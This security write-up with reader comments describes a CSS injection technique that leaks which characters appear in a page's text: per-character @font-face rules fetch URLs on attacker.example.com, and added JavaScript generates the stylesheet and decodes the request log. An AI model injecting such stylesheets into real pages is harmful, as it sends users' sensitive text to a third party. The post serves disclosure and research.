Using this technique, an attacker can partially read a page's text with CSS alone.
An attacker might use this technique in cases such as:
- Bypassing the browser's XSS filter (e.g. the XSS Auditor does not block <style> injection)
- Only CSS injection is possible in the target page
As far as I know, the known CSS-based attack can read attribute values (see Attribute Reader: http://p42.us/css/) but cannot read the characters of a text node. This vector can, although it is not perfect :)
So far, this vector works in Chrome and Firefox Nightly 44.
Let's go:
<style>
/* One @font-face per character. Each face has its own unicode-range and its
   own src URL, so the browser reveals which characters it needs. */
@font-face{
  font-family:poc;
  src: url(http://attacker.example.com/?A); /* fetched */
  unicode-range:U+0041;
}
@font-face{
  font-family:poc;
  src: url(http://attacker.example.com/?B); /* fetched too */
  unicode-range:U+0042;
}
@font-face{
  font-family:poc;
  src: url(http://attacker.example.com/?C); /* not fetched */
  unicode-range:U+0043;
}
#sensitive-information{
  font-family:poc;
}
</style>
<p id="sensitive-information">AB</p>
When you open this page, Chrome and Firefox fetch "?A" and "?B" because the text node of #sensitive-information contains the characters "A" and "B". They do not fetch "?C" because the text does not contain "C". So, from the requests that arrive at attacker.example.com, we have learned that the text contains "A" and "B" but not "C".
Let's see another example: http://vulnerabledoma.in/poc_unicode-range2.html
In DevTools you can see the external requests carrying the page text (M,a,s,t,o,K,i,n,u,g,w).
As you can see, duplicated characters cannot be distinguished: each @font-face is fetched at most once no matter how many times its character appears, and the order of the requests does not reveal their positions. But in some cases like this PoC, I think it gives an attacker enough information.
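The following is an added example, not code from the original post. It models the leak end to end: the attacker generates one @font-face per candidate character, the browser (modelled by simulateFontFetches, following the composite-font rule the post relies on) fetches only the faces whose unicode-range intersects the styled text, and the attacker turns the request log back into characters. The endpoint URL, the "c" query parameter and the sample text are assumptions made for this example; the text "Masato Kinugawa" is constructed so that its unique letters are exactly the ones listed for the second PoC.

```javascript
// Added example (not from the original post): generator, browser model and
// collector for the CSS unicode-range text leak.

const ENDPOINT = "https://attacker.example.com/font"; // assumed attacker host

// One face per code point in [from, to], each with its own URL.
function buildFaces(from, to, endpoint = ENDPOINT) {
  const faces = [];
  for (let cp = from; cp <= to; cp++) {
    const hex = cp.toString(16).toUpperCase().padStart(4, "0");
    faces.push({ cp, hex, url: `${endpoint}?c=${hex}` }); // "c" is an assumed parameter name
  }
  return faces;
}

// Render the faces as a stylesheet that applies the family to `selector`.
function buildLeakCss(selector, family, faces) {
  const rules = faces.map(
    (f) => `@font-face{font-family:${family};src:url(${f.url});unicode-range:U+${f.hex};}`
  );
  rules.push(`${selector}{font-family:${family};}`);
  return rules.join("\n");
}

// Model of the browser: a face is downloaded (once) only if at least one
// character of the styled text falls inside its unicode-range. Returns the
// URLs that would be requested. The real request order is not something the
// attacker can rely on, so callers should treat the result as a set.
function simulateFontFetches(faces, text) {
  const used = new Set(Array.from(text, (ch) => ch.codePointAt(0)));
  return faces.filter((f) => used.has(f.cp)).map((f) => f.url);
}

// Attacker side: turn request URLs from the access log back into characters.
// Returns the unique characters sorted by code point; multiplicity and
// position are lost because each face is fetched at most once.
function recoverLeakedChars(requestUrls) {
  const cps = new Set();
  for (const u of requestUrls) {
    const hex = new URL(u).searchParams.get("c");
    if (hex && /^[0-9A-F]{4,6}$/i.test(hex)) cps.add(parseInt(hex, 16));
  }
  return Array.from(cps)
    .sort((a, b) => a - b)
    .map((cp) => String.fromCodePoint(cp))
    .join("");
}

// Demo with constructed input. U+0041..U+007A covers A-Z, a few punctuation
// characters and a-z; the space in the sample text falls outside it.
const FACES = buildFaces(0x41, 0x7a);
const LEAK_CSS = buildLeakCss("#sensitive-information", "poc", FACES);
const FETCHED = simulateFontFetches(FACES, "Masato Kinugawa"); // constructed sample text
const RECOVERED = recoverLeakedChars(FETCHED); // "KMaginostuw"
```

Injecting LEAK_CSS into a page and watching the access log for the "c" parameter reproduces the PoC above for the whole range; the recovery step also shows the limitation from the post, since "ABBA" and "AB" produce the same set of requests.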
I reported this trick to the Chrome team, but it was marked WontFix (Issue 543078).
This behavior appears to be what the spec requires; see EXAMPLE 13 of http://www.w3.org/TR/css3-fonts/#composite-fonts. Thanks to this behavior users save bandwidth, because a font is downloaded only when a character inside its unicode-range is actually used, but as a side effect an attacker gets a new attack vector.
This is a really interesting way to exploit that the browser will go through all specified fonts, even if it's a hundred and none exists, it's still a request made.
You can easily use that for input fields, except the password type...
Any work-around to make duplicated characters work?
It could be possible to figure out character combinations using ligatures. I'm not sure if it's possible to make the requests to a remote server for ligatures other than those defined as separate characters in Unicode (in practice, only ff, ffi, fi).
A custom font could be used to make all character combinations different in width or height and somehow try to leak the width or height of the element to a remote server.